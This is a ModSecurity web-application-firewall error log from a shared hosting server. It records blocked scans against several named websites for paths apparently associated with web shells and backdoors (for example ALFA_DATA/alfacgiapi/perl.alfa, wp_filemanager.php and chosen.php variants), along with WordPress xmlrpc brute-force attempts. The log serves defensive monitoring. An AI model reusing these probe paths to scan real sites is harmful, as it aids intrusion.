[Tue May 26 14:22:12.486476 2026] [security2:error] [pid 606909:tid 607076] [client 20.206.67.134:3381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahVfPF0yRtX9qA7aVUVXNwAAAKo"], referer: www.google.com
[Tue May 26 14:22:12.492764 2026] [security2:error] [pid 606909:tid 607039] [client 20.226.60.108:39109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVfPF0yRtX9qA7aVUVXMQAAAIU"]
[Tue May 26 14:22:12.492851 2026] [security2:error] [pid 606909:tid 607039] [client 20.226.60.108:39109] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVfPF0yRtX9qA7aVUVXMQAAAIU"]
[Tue May 26 14:22:12.846260 2026] [security2:error] [pid 606909:tid 607099] [client 20.226.60.108:14463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/rip.php"] [unique_id "ahVfPF0yRtX9qA7aVUVXQQAAAME"]
[Tue May 26 14:22:12.846372 2026] [security2:error] [pid 606909:tid 607099] [client 20.226.60.108:14463] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/rip.php"] [unique_id "ahVfPF0yRtX9qA7aVUVXQQAAAME"]
[Tue May 26 14:22:13.200594 2026] [security2:error] [pid 606909:tid 607149] [client 20.226.60.108:14452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/archive.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXSwAAAPM"]
[Tue May 26 14:22:13.200708 2026] [security2:error] [pid 606909:tid 607149] [client 20.226.60.108:14452] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/archive.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXSwAAAPM"]
[Tue May 26 14:22:13.366890 2026] [security2:error] [pid 606909:tid 607088] [client 20.206.67.134:3215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/vadjyyoh.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXUAAAALY"], referer: www.google.com
[Tue May 26 14:22:13.566159 2026] [security2:error] [pid 606909:tid 607128] [client 20.226.60.108:14476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/66.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXWgAAAN4"]
[Tue May 26 14:22:13.566266 2026] [security2:error] [pid 606909:tid 607128] [client 20.226.60.108:14476] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/66.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXWgAAAN4"]
[Tue May 26 14:22:13.789451 2026] [security2:error] [pid 606909:tid 607087] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXVAAAALU"]
[Tue May 26 14:22:13.937922 2026] [security2:error] [pid 606909:tid 607053] [client 20.226.60.108:39153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ioxi-o.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXZgAAAJM"]
[Tue May 26 14:22:13.938012 2026] [security2:error] [pid 606909:tid 607053] [client 20.226.60.108:39153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ioxi-o.php"] [unique_id "ahVfPV0yRtX9qA7aVUVXZgAAAJM"]
[Tue May 26 14:22:14.302580 2026] [security2:error] [pid 606909:tid 607049] [client 20.226.60.108:14486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ms-edit.php"] [unique_id "ahVfPl0yRtX9qA7aVUVXbAAAAI8"]
[Tue May 26 14:22:14.302698 2026] [security2:error] [pid 606909:tid 607049] [client 20.226.60.108:14486] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ms-edit.php"] [unique_id "ahVfPl0yRtX9qA7aVUVXbAAAAI8"]
[Tue May 26 14:22:14.658738 2026] [security2:error] [pid 606909:tid 607155] [client 20.226.60.108:19118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVfPl0yRtX9qA7aVUVXeQAAAPk"]
[Tue May 26 14:22:14.658858 2026] [security2:error] [pid 606909:tid 607155] [client 20.226.60.108:19118] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVfPl0yRtX9qA7aVUVXeQAAAPk"]
[Tue May 26 14:22:15.025958 2026] [security2:error] [pid 606909:tid 607118] [client 20.226.60.108:48857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/404.php"] [unique_id "ahVfP10yRtX9qA7aVUVXhgAAANQ"]
[Tue May 26 14:22:15.026272 2026] [security2:error] [pid 606909:tid 607118] [client 20.226.60.108:48857] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/404.php"] [unique_id "ahVfP10yRtX9qA7aVUVXhgAAANQ"]
[Tue May 26 14:22:15.187982 2026] [security2:error] [pid 606909:tid 607159] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfPl0yRtX9qA7aVUVXfQAAAP0"]
[Tue May 26 14:22:15.380732 2026] [security2:error] [pid 606909:tid 607107] [client 20.226.60.108:22375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/file3.php"] [unique_id "ahVfP10yRtX9qA7aVUVXkQAAAMk"]
[Tue May 26 14:22:15.380841 2026] [security2:error] [pid 606909:tid 607107] [client 20.226.60.108:22375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/file3.php"] [unique_id "ahVfP10yRtX9qA7aVUVXkQAAAMk"]
[Tue May 26 14:22:15.761668 2026] [security2:error] [pid 606909:tid 607164] [client 20.226.60.108:46618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-mail.php"] [unique_id "ahVfP10yRtX9qA7aVUVXmwAAAQI"]
[Tue May 26 14:22:15.761774 2026] [security2:error] [pid 606909:tid 607164] [client 20.226.60.108:46618] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-mail.php"] [unique_id "ahVfP10yRtX9qA7aVUVXmwAAAQI"]
[Tue May 26 14:22:16.118876 2026] [security2:error] [pid 606909:tid 607148] [client 20.226.60.108:39132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/byp.php"] [unique_id "ahVfQF0yRtX9qA7aVUVXrwAAAPI"]
[Tue May 26 14:22:16.118999 2026] [security2:error] [pid 606909:tid 607148] [client 20.226.60.108:39132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/byp.php"] [unique_id "ahVfQF0yRtX9qA7aVUVXrwAAAPI"]
[Tue May 26 14:22:16.498343 2026] [security2:error] [pid 606909:tid 607063] [client 20.226.60.108:19108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfQF0yRtX9qA7aVUVXuwAAAJ0"]
[Tue May 26 14:22:16.498467 2026] [security2:error] [pid 606909:tid 607063] [client 20.226.60.108:19108] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfQF0yRtX9qA7aVUVXuwAAAJ0"]
[Tue May 26 14:22:16.850645 2026] [security2:error] [pid 606909:tid 607139] [client 20.226.60.108:19111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/index/chosen.php"] [unique_id "ahVfQF0yRtX9qA7aVUVX0QAAAOk"]
[Tue May 26 14:22:16.850736 2026] [security2:error] [pid 606909:tid 607139] [client 20.226.60.108:19111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/index/chosen.php"] [unique_id "ahVfQF0yRtX9qA7aVUVX0QAAAOk"]
[Tue May 26 14:22:17.203060 2026] [security2:error] [pid 606909:tid 607089] [client 20.226.60.108:39137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/about/chosen.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX3gAAALc"]
[Tue May 26 14:22:17.203175 2026] [security2:error] [pid 606909:tid 607089] [client 20.226.60.108:39137] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/about/chosen.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX3gAAALc"]
[Tue May 26 14:22:17.323574 2026] [security2:error] [pid 606909:tid 607129] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfQF0yRtX9qA7aVUVX1AAAAN8"]
[Tue May 26 14:22:17.572839 2026] [security2:error] [pid 606909:tid 607091] [client 20.226.60.108:42325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/as/chosen.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX4wAAALk"]
[Tue May 26 14:22:17.572994 2026] [security2:error] [pid 606909:tid 607091] [client 20.226.60.108:42325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/as/chosen.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX4wAAALk"]
[Tue May 26 14:22:17.930986 2026] [security2:error] [pid 606909:tid 607086] [client 20.226.60.108:39166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/init.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX6gAAALQ"]
[Tue May 26 14:22:17.931089 2026] [security2:error] [pid 606909:tid 607086] [client 20.226.60.108:39166] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/init.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX6gAAALQ"]
[Tue May 26 14:22:17.998016 2026] [security2:error] [pid 606909:tid 607120] [client 202.141.83.254:5856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX6wAAANY"]
[Tue May 26 14:22:17.998122 2026] [security2:error] [pid 606909:tid 607120] [client 202.141.83.254:5856] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfQV0yRtX9qA7aVUVX6wAAANY"]
[Tue May 26 14:22:18.297258 2026] [security2:error] [pid 606909:tid 607110] [client 20.226.60.108:14436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/file/chosen.php"] [unique_id "ahVfQl0yRtX9qA7aVUVX9QAAAMw"]
[Tue May 26 14:22:18.297338 2026] [security2:error] [pid 606909:tid 607110] [client 20.226.60.108:14436] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/file/chosen.php"] [unique_id "ahVfQl0yRtX9qA7aVUVX9QAAAMw"]
[Tue May 26 14:22:18.656838 2026] [security2:error] [pid 606909:tid 607056] [client 20.226.60.108:39119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/chosen/chosen.php"] [unique_id "ahVfQl0yRtX9qA7aVUVX_QAAAJY"]
[Tue May 26 14:22:18.656955 2026] [security2:error] [pid 606909:tid 607056] [client 20.226.60.108:39119] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/chosen/chosen.php"] [unique_id "ahVfQl0yRtX9qA7aVUVX_QAAAJY"]
[Tue May 26 14:22:19.027107 2026] [security2:error] [pid 606909:tid 607049] [client 20.226.60.108:39130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/css/chosen.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYBAAAAI8"]
[Tue May 26 14:22:19.027245 2026] [security2:error] [pid 606909:tid 607049] [client 20.226.60.108:39130] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/css/chosen.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYBAAAAI8"]
[Tue May 26 14:22:19.063852 2026] [security2:error] [pid 606909:tid 607076] [client 4.201.75.230:5462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/file.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYBQAAAKo"]
[Tue May 26 14:22:19.839205 2026] [security2:error] [pid 606909:tid 607135] [client 20.206.67.134:3367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYIgAAAOU"], referer: www.google.com
[Tue May 26 14:22:19.886280 2026] [security2:error] [pid 606909:tid 607062] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYEwAAAJw"]
[Tue May 26 14:22:19.897055 2026] [security2:error] [pid 606909:tid 607123] [client 20.206.67.134:3236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYJAAAANk"], referer: www.google.com
[Tue May 26 14:22:20.425576 2026] [security2:error] [pid 606909:tid 607159] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVfRF0yRtX9qA7aVUVYOQAAAP0"]
[Tue May 26 14:22:20.426177 2026] [security2:error] [pid 606909:tid 607066] [client 106.222.227.47:25563] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVfRF0yRtX9qA7aVUVYMQAAAKA"]
[Tue May 26 14:22:20.908986 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYEAAAAOY"]
[Tue May 26 14:22:20.909017 2026] [security2:error] [pid 606909:tid 607136] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfQ10yRtX9qA7aVUVYEAAAAOY"]
[Tue May 26 14:22:20.909500 2026] [security2:error] [pid 606909:tid 607121] [client 20.226.60.108:46609] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/ALFA_DATA/alfacgiapi/perl.alfa"] [unique_id "ahVfQ10yRtX9qA7aVUVYDgAAANc"]
[Tue May 26 14:22:21.453447 2026] [security2:error] [pid 606909:tid 607115] [client 20.226.60.108:46609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/style.php"] [unique_id "ahVfRV0yRtX9qA7aVUVYXAAAANE"]
[Tue May 26 14:22:21.453646 2026] [security2:error] [pid 606909:tid 607115] [client 20.226.60.108:46609] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/style.php"] [unique_id "ahVfRV0yRtX9qA7aVUVYXAAAANE"]
[Tue May 26 14:22:21.495103 2026] [security2:error] [pid 606909:tid 607147] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfRV0yRtX9qA7aVUVYTQAAAPE"]
[Tue May 26 14:22:21.821112 2026] [security2:error] [pid 606909:tid 607099] [client 20.226.60.108:39838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/admin.php"] [unique_id "ahVfRV0yRtX9qA7aVUVYagAAAME"]
[Tue May 26 14:22:21.821231 2026] [security2:error] [pid 606909:tid 607099] [client 20.226.60.108:39838] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/admin.php"] [unique_id "ahVfRV0yRtX9qA7aVUVYagAAAME"]
[Tue May 26 14:22:22.174845 2026] [security2:error] [pid 606909:tid 607092] [client 20.226.60.108:39822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/inputs.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYeQAAALo"]
[Tue May 26 14:22:22.174943 2026] [security2:error] [pid 606909:tid 607092] [client 20.226.60.108:39822] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/inputs.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYeQAAALo"]
[Tue May 26 14:22:22.396759 2026] [security2:error] [pid 606909:tid 607134] [client 20.206.67.134:3228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYhQAAAOQ"]
[Tue May 26 14:22:22.404443 2026] [security2:error] [pid 606909:tid 607058] [client 4.201.75.230:5453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/adminfuns.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYiAAAAJg"]
